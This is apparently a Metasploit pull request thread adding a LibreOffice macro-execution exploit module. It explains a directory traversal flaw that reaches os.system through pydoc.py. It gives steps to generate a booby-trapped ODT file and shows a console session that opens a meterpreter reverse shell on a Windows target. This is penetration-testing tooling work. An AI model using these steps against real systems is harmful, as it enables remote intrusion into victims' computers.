Add Libreoffice macro exec exploit module

[space-r7]

This module exploits a directory traversal vulnerability in LibreOffice v6.1.0-6.1.2.1 that enables remote code execution.

LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events to them. A macro can be tied to a program event by including the script that contains the macro and the function name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the Python script to be executed. This allows a program event to execute functions from Python scripts relative to the path of the samples macros folder. The pydoc.py script included with LibreOffice contains the tempfilepager function that passes arguments to os.system, allowing RCE.

This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code. Tested on LibreOffice versions 6.1.0.1 and 6.1.2.1 on Windows and Linux.

Note: 6.0.x and 6.1.3.x versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by this module due to the lack of ability to pass arguments.

Verification

• Install the application
• Start msfconsole
• Do: use exploit/multi/fileformat/libreoffice_macro_exec
• Do: set FILENAME <name>
• Do: set LHOST <ip>
• Do: set LPORT <port>
• Do: run
• Move the generated file to the target
• Start a handler
• Open the file with a vulnerable version of LibreOffice
• You should get a shell.

Scenarios

  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run

  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (179779 bytes) to 192.168.37.156
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500

  meterpreter > getuid
  Server username: WIN-MGMN7ND70I1\a_user
  meterpreter > sysinfo
  Computer        : WIN-MGMN7ND70I1
  OS              : Windows 7 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 1
  Meterpreter     : x86/windows

[busterb]

While 'Arch' here seems to indicate I can select a 64-bit payload, the targets below restrict this to just 32-bit.

I wonder if you couldn't just use 'ARCH_ALL', since I don't think it actually matters for this exploit.

[busterb]

Executing a default payload in this context hangs LibreOffice, if the payload does not return execution to the script. I think setting PrependMigrate / PrependFork is a must for any native payloads. Would it make sense to have that automatically configured by the module?

[space-r7]

Executing a default payload in this context hangs LibreOffice, if the payload does not return execution to the script. I think setting PrependMigrate / PrependFork is a must for any native payloads. Would it make sense to have that automatically configured by the module?

That makes sense to me. Thank you!

[busterb]

Perfect, thanks!

[busterb]

Release Notes

The multi/fileformat/libreoffice_macro_exec exploit module has been added to the framework. This module exploits a directory traversal vulnerability in LibreOffice v6.1.0-6.1.2.1 that enables remote code execution by running sample macros bundled with the suite.